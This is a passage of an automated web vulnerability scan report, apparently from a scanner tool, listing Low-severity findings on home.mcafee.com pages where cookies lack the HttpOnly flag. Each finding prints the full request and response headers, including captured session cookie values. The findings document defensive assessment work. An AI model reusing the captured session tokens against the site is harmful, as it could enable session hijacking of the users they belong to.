14.39. http://home.mcafee.com/Root/AboutUs.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /Root/AboutUs.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Root/AboutUs.aspx HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/Root/AboutUs.aspx; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fRoot%2fAboutUs.aspx&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV4
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:54 GMT
Content-Length: 34628
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

14.40. http://home.mcafee.com/Root/Support.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /Root/Support.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Root/Support.aspx HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/Root/Support.aspx; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fRoot%2fSupport.aspx&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV4
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:55 GMT
Content-Length: 30428
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

14.41. http://home.mcafee.com/SiteMap.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /SiteMap.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SiteMap.aspx HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:03 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:19:03 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/SiteMap.aspx; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:03 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:03 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fSiteMap.aspx&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV5
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:19:03 GMT
Content-Length: 74774
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

14.42. http://home.mcafee.com/Store/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /Store/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Store/ HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Location: http://home.mcafee.com/Store/Store9.aspx?
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/Store/Default.aspx; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fStore%2fDefault.aspx&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV10
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:56 GMT
Content-Length: 0
Connection: close


14.43. http://home.mcafee.com/Store/Downloads.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /Store/Downloads.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Store/Downloads.aspx HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:58 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:58 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/Store/Downloads.aspx; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:58 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:58 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fStore%2fDownloads.aspx&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV6
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:57 GMT
Content-Length: 60299
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

14.44. http://home.mcafee.com/VirusInfo/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /VirusInfo/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /VirusInfo/ HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
